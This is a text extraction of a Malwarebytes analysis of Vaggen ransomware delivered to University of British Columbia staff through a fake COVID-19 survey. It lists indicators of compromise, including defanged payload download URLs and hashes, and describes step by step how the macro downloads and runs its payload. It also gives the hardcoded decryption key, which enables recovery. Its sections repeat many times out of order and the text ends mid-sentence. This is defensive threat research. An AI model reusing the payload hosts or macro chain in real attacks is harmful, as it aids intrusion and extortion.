Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3125 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3126 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3127 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3128 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3129 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3130 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3131 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3132 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3133 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3134 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3135 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3136 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3137 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3138 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3139 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3140 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3141 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3142 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3143 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3144 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3145 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3146 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3147 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3148 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3149 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3150 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3151 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3152 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3153 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3154 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3155 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3156 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3157 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3158 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with 